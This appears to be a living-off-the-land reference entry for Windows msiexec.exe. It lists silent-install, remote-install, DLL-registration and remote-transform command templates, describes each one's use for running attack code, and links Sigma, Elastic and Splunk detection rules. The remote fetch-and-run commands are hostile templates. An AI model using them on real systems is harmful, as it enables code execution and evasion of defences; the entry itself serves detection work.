Msiexec.exe
Used by Windows to execute msi files
Paths
C:\Windows\System32\msiexec.exeC:\Windows\SysWOW64\msiexec.exe
Commands
Execute
Installs the target .MSI file silently.
Use case: Execute custom made msi file with attack code
Privileges: User
msiexec /quiet /i {PATH:.msi}Execute
Installs the target remote & renamed .MSI file silently.
Use case: Execute custom made msi file with attack code from remote server
Privileges: User
msiexec /q /i {REMOTEURL}Execute
Calls DllRegisterServer to register the target DLL.
Use case: Execute dll files
Privileges: User
msiexec /y {PATH_ABSOLUTE:.dll}Execute
Calls DllUnregisterServer to un-register the target DLL.
Use case: Execute dll files
Privileges: User
msiexec /z {PATH_ABSOLUTE:.dll}Execute
Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
Use case: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
Privileges: User
msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qbDetection
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml
- IOC: msiexec.exe retrieving files from Internet